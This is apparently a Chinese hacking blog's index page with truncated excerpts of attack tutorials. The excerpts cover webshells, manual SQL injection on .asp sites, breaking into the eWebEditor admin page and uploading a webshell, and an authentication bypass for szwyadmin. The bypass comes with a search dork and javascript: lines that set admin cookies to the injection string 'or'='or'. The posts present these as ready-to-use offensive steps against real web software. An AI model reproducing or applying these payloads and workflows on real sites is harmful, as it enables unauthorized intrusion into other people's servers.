xlh006的博客

一、什么是webshellwebshell简介webshell，顾名思义：web指的是在web服务器上，而shell是用脚本语言编写的脚本程序，webshell就是就是web的一个管理工具，可以对web服务器进行操作的权限，也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途，但是由于webshell的功能比较强大，可以上传下载文件，查看数据库，甚至...

SQL手工注入原理： 下面就是比较笨的方法了==    一个一个试 (*￣rǒ￣)针对于.asp后缀网 + ?id_  在后面加入下面代码，返回正确那就是无注入点，反正就是有注入点一、什么是SQL注入SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用...

一、介绍eWebEditoreWebEditor是一个基于浏览器的在线HTML编辑器，WEB开发人员可以用她把传统的多行文本输入框替换为可视化的富文本输入框二、获得eWebEditor后台登录地址ewebeditor/Admin_Login.asp三、登录四、拷贝样式五、修改样式设置六、上传小马七、访问OK 一、介绍CookiesCookies就是服务器暂时存...

azwyadmin程序cookies欺骗漏洞：一、搜索关键字inurl:szwyadmin/login.asp二、进入执行代码javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"...